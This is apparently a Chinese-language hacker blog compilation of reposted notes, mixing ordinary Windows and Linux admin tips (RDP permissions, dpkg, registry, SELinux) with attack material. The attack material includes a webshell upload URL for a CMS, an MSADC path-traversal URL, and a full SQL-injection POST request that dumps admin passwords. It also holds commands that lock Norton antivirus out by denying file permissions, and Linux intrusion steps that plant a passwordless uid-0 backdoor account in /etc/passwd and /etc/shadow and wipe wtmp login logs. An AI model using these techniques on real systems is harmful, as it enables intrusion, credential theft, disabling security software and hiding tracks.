远程桌面登录提示该用户没有登录权限

转载自:http://blog.csdn.net/hellotianma/archive/2010/07/19/5747138.aspx

登录时弹出提示：要登录到这台远程计算机，您必须被授予允许通过终端服务登录的权限。

默认情况下， Remote Desktop Users（远程桌面用户）组的成员拥有该权限。可以将需要远程登录的用户加入到该组，或者直接给指定的用户添加远程登录的权限。

具体解决办法：

（1）如果是域用户(zerosoul:先确定加到本地administrators组了没)：
1. 首先得确认需要使用远程桌面登录的域用户加入到了Remote Desktop Users（远程桌面用户） 组中。

2. 打开“Active Directory（活动目录）用户和计算机”，右键单击希望使用远程桌面登录的域用户的属性，单击“终端服务配置文件”选项卡，然后单击选中“允许登录到终端服务器”复选框。

3. 打开“开始 - 运行”，键入“gpedit.msc”，从而打开组策略，选择“计算机配置 - Windows设置 - 本地策略 - 用户权限分配”，检查

• 双击“通过终端服务拒绝登陆”项，如果有Remote Desktop Users，则删除 。
• 双击“允许本地登陆”项，如果没有Remote Desktop Users，则添加 。
• 双击“拒绝本地登陆”项，如果有Remote Desktop Users，则删除 。
• 双击“从网络访问此计算机”项，如果没有Remote Desktop Users，则添加 。
• 双击“拒绝从网络访问此计算机”项，如果没有Remote Desktop Users，则删除 。

4. 在客户端上分别执行此操作，点击“开始 - 运行”，键入“CMD” ,从而打开命令行窗口，输入“GPUPDATE/FORCE”，强制刷新组策略并重启计算机。

（2）如果是本地用户：

1. 打开“开始 - 运行 - gpedit.msc”，从而打开组策略，选择“计算机配置 - Windows设置 - 本地策略 - 用户权限分配”

2. 在“从网络访问此计算机”项上双击，添加该用户即可。

3. 或者添加该用户到Remote Desktop Users（远程桌面用户）组，同时参考（1）-3来检查该组是否具有相应的远程登录权限。

雷池新闻发布系统上传WebShell

注意看URL picName=test.asp

http://site.com/admin/uploadPic.asp?actionType=mod&picName=test.asp

然后访问

http://site.com/uppic/test.asp

[转载]安装/卸载deb包文件

来源:

http://hi.baidu.com/%C7%E5%D0%C4%D1%C5%C9%E1/blog/item/65c5a58fd94335edf01f3652.html

dpkg -i openq_0.3.2-2006_i386.deb (安装openq)

dpkg -l | grep openq (查找openq)

dpkg -r openq (删除openq)

dpkg --purge openq (删除openq的配置文件)

怎么处理变态诺顿的方法

非原创，转载自angel's Blog:http://www.sablog.net/blog/archives/470/

还没亲自验证过，下回遇到验证下。

---------------------------------------

经常碰到诺顿企业版。本地怎么也停止不了。。以前做过卸载诺顿。但是那是在交互环境下的。今天再记录一下变态的招数。。在命令行下。。

查看诺顿服务的路径
sc qc ccSetMgr

然后设置权限拒绝访问。做绝一点。。
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

然后再重启服务器
iisreset /reboot

这样就搞定了。。不过完事后。记得恢复权限。。。。

cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F

隐藏VPN传入的连接

来源：NetKnave's BLog

架好VPN之时(通过新建传入连接这种方式),会在网络连接里出现一个传入的连接,如果要想去掉这个的话,就要修改一下注册表.
[HKEY_CLASSES_ROOT\Interface\{0000010c-0000-0000-C000-000000000046}]

删掉这个键值后,注销再登,就会发现那个传入的连接不见了.

-------------------------

貌似只有2000有效，测试删掉后本地连接图标也会消失。以下为2000下该注册表项备份，方便恢复。

-------------------------

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\Interface\{0000010c-0000-0000-C000-000000000046}]

@="IPersist"

[HKEY_CLASSES_ROOT\Interface\{0000010c-0000-0000-C000-000000000046}\NumMethods]

@="4"

[HKEY_CLASSES_ROOT\Interface\{0000010c-0000-0000-C000-000000000046}\ProxyStubClsid32]

@="{00000320-0000-0000-C000-000000000046}"

Linux服务器程序访问网络设置

貌似服务器版本的不允许程序访问自己的IP，但假如有时候要用到Apache的Rewrite，Rewrite到本机的话，必须让自己能访问自己。

# /usr/sbin/setsebool httpd_can_network_connect 1 OR # /usr/sbin/setsebool httpd_can_network_connect true

MSADC

文件夹绝对路径
c:\Program Files\Common Files\System\MSADC\Samples\

先关可利用URL(/msadc/samples/必须要跟，源码是web路径中的)
http://12.34.56.78/msadc/samples/selector/showcode.asp?source=/msadc/samples/../../default.asp

MY动力(MyPower)3.51注入漏洞手动利用

c:\>nc www.site.com 80<send.txt

//send.txt

POST /Article_Print.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Microsoft URL Control - 6.01.9782

Host: www.site.com

Content-Length: 277

Cache-Control: no-cache

ArticleID=1000%20union%20(select%20top%201%201,1,'user:'%2busername%2bchr(124),'pass:'%2bpassword%2bchr(124),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20(select%20top%201%20username,password%20from%20admin%20order%20by%20username)%20order%20by%20username%20desc)

相关工具:动力文章v3.51注入程序（http://www.3800hk.com/Soft/zhly/18573.html）

查admin表记录数量，POST如下

ArticleID=1000%20union%20(select%20top%201%201,1,1,count(*),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20admin)

[转载]linux入侵常用命令

From:http://blog.homedz.com/article.asp?id=141

给自己省事了，呵呵

cat /etc/passwd 查看linux用户
cat /etc/shadow 查看用户密码需要root权限
cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息
ifconfig 查看本机ip信息
cat /etc/resolv.conf 查看DNS信息
bash -i 在反弹的shell中使用可以直观显示命令
bash prompt: 当你以普通限权用户身份进入的时候，一般你会有一个类似bash$的prompt。当你以Root登陆时，你的prompt会变成
bash#。
系统变量 : 试着echo "$USER / $EUID" 系统应该会告诉你它认为你是什么用户。
echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward,
vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!
netstat -an |grep LISTEN |grep :80 查看端口
service --status-all | grep running

service --status-all | grep http
查看运行服务
lsb_release -a 查看系统版本
重启ssh服务 ：/usr/sbin/sshd stop
/usr/sbin/sshd start
ssd_config文件里
PasswordAuthentication no,
将其改为
PasswordAuthentication yes
远程ssh才可登录
否则显示Access denied

其中Usepam yes可能用来建立pam方式login，比如从其它linux主机ssh到服务端，如果关闭，则不能打开.

su的菜鸟用法
先chomod 777 /etc/passwd
然后修改bin用户的gid和uid为0
然后passwd设置bin的密码
然后cp /bin/bash /sbin/nologin
然后su的时候su - bin就可以到rootshell了。
这个原理就是当ssh不允许root用ssh终端登陆的时候，我们又不知道root密码，的一种很菜鸟的做法
还可以这样
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd

gcc prtcl2.c –o local –static –Wall

echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

清空last记录 cp /dev/null /var/log/wtmp
-----
dd if=/dev/zero of=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的

命令行简单辨别域主机

ipconfig /all 命令查看是否有Primary Dns Suffix这一项，有则在域中。

当然也可以用systeminfo命令直接查看，不过速度没有此命令快。